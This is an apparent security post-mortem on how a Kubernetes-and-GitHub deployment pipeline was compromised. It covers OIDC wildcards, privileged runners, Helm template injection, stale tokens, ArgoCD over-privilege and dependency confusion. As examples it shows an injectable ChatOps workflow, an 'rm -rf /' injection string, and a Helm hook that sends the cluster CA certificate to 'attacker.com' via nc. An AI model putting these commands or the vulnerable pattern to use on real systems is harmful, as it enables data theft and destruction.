kubernetes github - Guide

Table of Contents

Threat Model Assessment: The Infrastructure as a Suicide Note

The industry’s current obsession with “GitOps” and the “kubernetes github” integration is not a step forward in engineering; it is a collective surrender to convenience at the expense of fundamental security principles. By tethering a production Kubernetes v1.30.1 cluster to a third-party, cloud-hosted version control system like GitHub, organizations are effectively extending their trust boundary to an external entity they do not control, managed by developers who prioritize velocity over verification.

The threat model for a standard “kubernetes github” workflow assumes that the “source of truth” (the repository) is immutable and secure. This is a lethal delusion. In reality, the repository is a volatile collection of text files subject to social engineering, compromised developer workstations, and flawed branch protection rules. When you automate the deployment of these files into a cluster, you are not “automating delivery”; you are building a high-speed injection vector for malicious actors.

The “kubernetes github” bridge creates a bidirectional risk. First, the CI/CD runners (GitHub Actions Runner v2.316.0) require high-privilege credentials to modify the cluster state. Second, the cluster, if using a pull-based GitOps controller like ArgoCD or Flux, must constantly poll the GitHub API, creating a dependency on external availability and exposing the cluster to “repo-jacking” or upstream dependency confusion. We are no longer defending a perimeter; we are defending a sieve. This post-mortem analyzes the wreckage of such a “modern” stack, where the “kubernetes github” integration served as the primary catalyst for total infrastructure collapse.

Finding 0x01: The OIDC Handshake as a Trojan Horse

The transition from static ServiceAccount tokens to OpenID Connect (OIDC) was marketed as a security upgrade. In this incident, it was the primary entry point. The organization configured an OIDC trust between GitHub Actions and the Kubernetes v1.30.1 API server to avoid storing long-lived secrets. However, the “kubernetes github” trust policy was defined with a catastrophic lack of specificity.

The sub (subject) claim in the OIDC token was configured using a wildcard. Instead of pinning the trust to a specific repository and environment, the administrator allowed any repository within the organization to assume the cluster-admin role.

Technical Violation:
The IAM role trust policy allowed repo:org-name/*. An attacker, having compromised a low-stakes documentation repository within the same GitHub organization, triggered a workflow that requested a JWT from GitHub’s OIDC provider. Because the “kubernetes github” integration didn’t validate the specific repository name, the Kubernetes API server accepted the token and granted the attacker full administrative access.

This is the “convenience” trap. By making it “easy” for developers to spin up new projects without updating IAM policies, the security team effectively turned every repository into a potential cluster-admin.

Finding 0x02: Escape from GitHub Actions Runner v2.316.0

To “save costs,” the team deployed self-hosted runners using GitHub Actions Runner v2.316.0 inside the production cluster. These runners were configured as “privileged” containers to allow Docker-in-Docker (DinD) builds. This is a textbook example of architectural negligence.

A compromised “kubernetes github” workflow allowed an attacker to execute a malicious step in a .github/workflows/deploy.yaml file. Since the runner was privileged, the attacker didn’t just compromise the CI job; they escaped the container and gained root access to the underlying Kubernetes node.

The Configuration Error:

# Snippet from the self-hosted runner deployment
spec:
  containers:
  - name: runner
    image: actions-runner:v2.316.0
    securityContext:
      privileged: true # This is where the security model dies
    volumeMounts:
    - name: docker-storage
      mountPath: /var/lib/docker

The attacker used a simple nsenter command to pivot from the runner container to the host OS. From there, they harvested the Kubelet’s credentials and began lateral movement across the VPC. The “kubernetes github” integration provided the initial execution context, and the “convenience” of self-hosted runners provided the escalation path.

Finding 0x03: Helm v3.14.2 Template Injection and RBAC Bloat

The organization utilized Helm v3.14.2 for managing deployments. The “kubernetes github” pipeline was configured to run helm upgrade --install on every push to the main branch. We found that the Helm charts were not being linted for security violations, and more importantly, they were using dynamic values passed directly from GitHub Action environment variables.

An attacker injected a malicious snippet into a GitHub secret that was subsequently passed into a Helm template. Because Helm templates are essentially string interpolations, the attacker was able to inject an additional ClusterRoleBinding into the rendered manifest.

Cynical Analysis of the Rendered Manifest:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: helm-release-manager-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io/kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: default
  namespace: kube-system # Injected via a malformed 'values.yaml'

The “kubernetes github” workflow blindly applied this manifest. The auditor notes that the kube-system:default ServiceAccount should never have cluster-admin privileges, yet the “automated” nature of the pipeline meant no human ever reviewed the final rendered YAML. We are automating our own destruction.

Finding 0x04: The Fallacy of Default ServiceAccount Tokens in CI

Despite Kubernetes v1.24+ moving away from auto-generating ServiceAccount tokens, this infrastructure (v1.30.1) had legacy configurations that re-enabled them for “compatibility” with older “kubernetes github” scripts.

During the audit, we discovered a Secret object containing a long-lived token for a ServiceAccount named github-deployer. This token was created three years ago and had no expiration. It was stored in a GitHub Secret named KUBECONFIG_DATA.

When a developer’s GitHub account was compromised via a session hijacking attack, the attacker simply used the gh CLI to list and retrieve the secret. Since the token was static and had no IP whitelisting (which is nearly impossible to implement with GitHub’s dynamic runner IP ranges), the attacker had a permanent back-door into the cluster that bypassed all OIDC protections.

Finding 0x05: GitOps Controller Over-Privilege (The ArgoCD Trap)

The organization implemented a GitOps model using ArgoCD, believing that “pull-based” deployments are inherently more secure than “push-based” ones. This is a marketing myth. While it removes the need for GitHub to hold cluster credentials, it requires the cluster to hold GitHub credentials (PATs or SSH keys) to pull private repositories.

The ArgoCD instance was granted cluster-admin permissions so it could “seamlessly” manage any resource. When the attacker gained write access to the “kubernetes github” repository, they didn’t need to attack the cluster directly. They simply modified the deployment.yaml in Git. ArgoCD, acting as a high-privilege confused deputy, dutifully pulled the malicious change and applied it to the production environment.

The “kubernetes github” synchronization loop became a weapon. The attacker didn’t need to know kubectl; they just needed to know git push.

Finding 0x06: Secret Leakage via Log Aggregation

The “kubernetes github” integration frequently involves passing sensitive data through environment variables. We found that the GitHub Actions logs were being forwarded to a centralized logging platform (Splunk).

A failed helm install command in the CI pipeline resulted in a verbose error message that dumped the entire values.yaml file—including decrypted secrets—into the standard output. Because the “kubernetes github” runner was configured with --debug, the logs contained the plaintext database passwords and API keys.

The Log of Failures:

Below is the raw evidence of the collapse. Note the timestamps and the utter lack of intervention.

# Terminal Output: kubectl get events -n production
LAST SEEN   TYPE      REASON             OBJECT                               MESSAGE
12m         Normal    Scheduled          pod/malicious-proxy-6789             Successfully assigned production/malicious-proxy-6789 to ip-10-0-45-12
11m         Warning   FailedMount        pod/malicious-proxy-6789             MountVolume.SetUp failed for volume "vault-token" : secret "vault-token" not found
10m         Normal    Created            pod/malicious-proxy-6789             Created container proxy
10m         Normal    Started            pod/malicious-proxy-6789             Started container proxy
9m          Warning   Unhealthy          pod/malicious-proxy-6789             Readiness probe failed: HTTP probe failed with statuscode: 500
8m          Normal    SuccessfulCreate   job/exfiltrate-data                  Created pod: exfiltrate-data-v2

Cynical Note: The “Readiness probe failed” was the only sign of trouble, yet it was ignored because “the pipeline is always flaky.” The attacker was already exfiltrating the customer database via a Job they injected through the “kubernetes github” workflow.

# Terminal Output: git log --pretty=oneline -n 5
a1b2c3d4 (HEAD -> main, origin/main) chore: update deployment manifests [skip ci]
e5f6g7h8 Merge pull request #402 from 'dependabot/npm_and_yarn/ws-7.5.10'
i9j0k1l2 feat: add new microservice (Author: "DevOps Bot" <[email protected]>)
m3n4o5p6 fix: temporary bypass for rbac issues in dev
q7r8s9t0 security: update github actions runner to v2.316.0

Cynical Note: Look at m3n4o5p6. A “temporary bypass” that was merged without review because the “kubernetes github” automation was configured to auto-approve any PR from the “DevOps Bot.” This is where the attacker hid their initial RBAC escalation.

# Terminal Output: gh secret list -R our-org/production-manifests
NAME                  UPDATED
KUBECONFIG_DATA       about 3 years ago
AWS_ACCESS_KEY_ID     about 2 years ago
AWS_SECRET_ACCESS_KEY about 2 years ago
DOCKER_PASSWORD       about 1 year ago
GH_PAT_TOKEN          about 4 months ago

Cynical Note: KUBECONFIG_DATA updated 3 years ago. In an industry that talks about “ephemeral credentials,” this is a fossilized vulnerability. The “kubernetes github” integration was running on a key that should have been rotated a dozen times over.

Finding 0x07: The Architectural Flaw of “Convenience” Features

The root cause of this breach was the “kubernetes github” integration’s reliance on “convenience” features. Specifically, the use of github.event.client_payload in Actions to trigger cluster-side jobs.

The developers implemented a “ChatOps” feature where typing /deploy in a GitHub Issue would trigger a Kubernetes Job. This was implemented using a GitHub Action that parsed the issue comment and passed it as an argument to kubectl.

The Vulnerable Workflow Snippet:

- name: Deploy via ChatOps
  run: |
    kubectl run debug-pod-${{ github.event.issue.number }} \
    --image=alpine -- /bin/sh -c "${{ github.event.comment.body }}"

This is not just a security hole; it is a security canyon. An attacker simply commented on a public issue with ; rm -rf / --no-preserve-root (or more realistically, a curl command to download a reverse shell). The “kubernetes github” integration dutifully executed this string as a shell command inside the cluster.

The auditor asks: Why was this allowed? The answer is always the same: “It made it faster for the developers to debug.” We have traded our integrity for a few seconds of saved time.

Finding 0x08: Inadequate Network Policies for CI/CD Components

The Kubernetes v1.30.1 cluster had no NetworkPolicies restricting the GitHub Actions runners. Once the attacker gained a shell on a runner pod, they had unrestricted internal access to the Kube-API, the Metadata Service (IMDS), and the internal databases.

The “kubernetes github” setup assumes that the runner is a “trusted” entity. But in a containerized environment, “trust” is a vulnerability. The runner should have been isolated in a sandbox namespace with zero egress to the rest of the cluster. Instead, it was placed in the default namespace.

The Resulting Lateral Movement:
1. Attacker gains shell on gh-runner-pod.
2. Attacker queries https://kubernetes.default.svc using the runner’s ServiceAccount.
3. Attacker discovers the vault-server service.
4. Attacker exploits an unpatched vulnerability in an old Vault sidecar to dump all production secrets.

All of this was possible because the “kubernetes github” integration was viewed as a “tool” rather than a “threat.”

Finding 0x09: The Myth of Protected Branches

The organization claimed that “branch protection” on GitHub prevented unauthorized changes to the “kubernetes github” manifests. However, we found that “Administrators” were exempt from these rules.

The attacker, after compromising a senior engineer’s Personal Access Token (PAT) which had repo and admin scopes, simply disabled branch protection for five minutes, pushed a malicious Deployment manifest, and re-enabled the protection. The GitOps controller (ArgoCD) saw the commit on main and immediately synchronized the malicious state.

The “kubernetes github” workflow relies on the integrity of the VCS, but the VCS is managed via a web UI that is vulnerable to session hijacking, MFA fatigue, and administrative override. If your cluster’s security depends on a checkbox in a GitHub settings menu, you do not have a secure cluster.

Finding 0x10: Supply Chain Poisoning via Helm v3.14.2 Dependencies

The final nail in the coffin was the use of third-party Helm charts. The “kubernetes github” pipeline was configured to run helm dependency update before every deployment.

The attacker performed a “dependency confusion” attack. They identified a private Helm chart used by the organization, named company-auth-proxy. They then uploaded a higher-versioned chart with the same name to a public repository. The “kubernetes github” runner, configured with default Helm settings, pulled the public (malicious) chart instead of the private one.

This malicious chart contained a post-install hook that executed a script to exfiltrate the cluster’s CA certificate and private key.

The Hook of Death:

# templates/post-install-hook.yaml
apiVersion: batch/v1
kind: Job
metadata:
  annotations:
    "helm.sh/hook": post-install
spec:
  template:
    spec:
      containers:
      - name: exfil
        image: busybox
        command: ["/bin/sh", "-c", "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt | nc attacker.com 4444"]
      restartPolicy: Never

The “kubernetes github” pipeline reported a “Success,” while the attacker was busy downloading the keys to the kingdom.

Conclusion: The Cost of Integration

The “kubernetes github” integration is not a feature; it is a liability. Every point of “seamless” connection is a point of failure. We have built a world where a single git push can bypass firewalls, RBAC, and common sense.

This post-mortem is not a call for better configuration; it is a call for a fundamental reassessment of the “GitOps” philosophy. If you continue to use “kubernetes github” workflows without strict OIDC pinning, isolated runners, mandatory manifest signing, and zero-trust network policies, you are not an engineer. You are a gambler. And the house—the attacker—always wins.

The logs don’t lie. The “kubernetes github” bridge was the path of least resistance. It worked exactly as designed, and that is precisely why we failed. Stop looking for “robust” solutions and start looking for the “convenience” features that are currently killing your infrastructure. Audit your “kubernetes github” integration today, or I will be writing your post-mortem tomorrow.

Explore more insights and best practices:

kubernetes github – Guide